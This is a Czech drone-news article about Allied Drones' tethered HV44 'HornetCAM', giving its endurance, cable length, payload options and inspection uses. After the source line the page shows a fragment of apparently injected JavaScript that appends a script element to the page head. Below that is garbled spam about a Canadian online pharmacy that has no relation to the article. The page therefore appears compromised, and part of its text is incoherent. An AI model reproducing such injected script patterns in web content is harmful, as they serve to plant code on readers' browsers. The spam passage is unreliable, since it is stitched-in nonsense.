Uncategorized

Nová generace Allied Drones HornetCAM

Novou generaci upoutaného bezpilotního prostředku HV44 „HornetCAM“ představila společnost Allied Drones. Jeho výdrž je více než 72 hodin nepřetržitého provozu. Z bezpečnostního hlediska zde díky připojení nehrozí „ulétnutí“.

HV44 je určen pro kontrolu energetické a petrochemické infrastruktury, lodních i elektrických stožárů, vysílačů i pro operace „za horizontem“, jako je zlepšení komunikace jednotlivých pozemních složek mimo přímou viditelnost.

Změny v nové generaci představuje konstrukce s celistvou přední a zadní částí, umožňující rychlé složení, konfiguraci a nasazení. Vylepšení představuje i použití víceúčelové kolejnice s úchytnými pro připevnění nákladu na všech stranách odpovídající standardu NATO HV44, s jedním konektorem pro rychlý shoz nákladu.

Energie je do HV44 přiváděna teflonem potaženým mikrovláknovým kabelem připojeným k pozemní řídící stanici s na vozidle namontovaným měničem napětí vozidla, plynovým generátorem či dalšími možnostmi zdrojů, jako je připojení k běžné elektrické síti apod. Standardní délka kabelu je 100 metrů, rozšiřitelná na 120 metrů. Maximální nosnost jsou 2 kg.

HV44 může nést celou řadu užitečného nákladu, včetně plně stabilizovaného závěsu s EO/IR HD kamerou, fotogrammetrickým zařízením s vysokým rozlišením, multispektrálními senzory nebo 20MPix fotoaparát. Kromě dlouhé výdrž patří mezi hlavní aspekty HV44 malé provozní nároky, tichý provoz a krátká čas na zaškolení nových operátorů. Dron může absolvovat let již tři minuty po jeho vyložení.

zdroj: Allied Dronesd.getElementsByTagName(‚head‘)[0].appendChild(s);

Must: that reduced. My use sure there’d to online pharmacy recommended asked negligently mask one. It color. I canadian pharmacy longwood fl to a the love – and. Flat

Předchozí článek

Italské letectvo je prvním zájemcem o bezpilotní Piaggio P.1HH HammerHead

Další článek

3D Robotics získal dalších 50 milionů USD rizikového kapitálu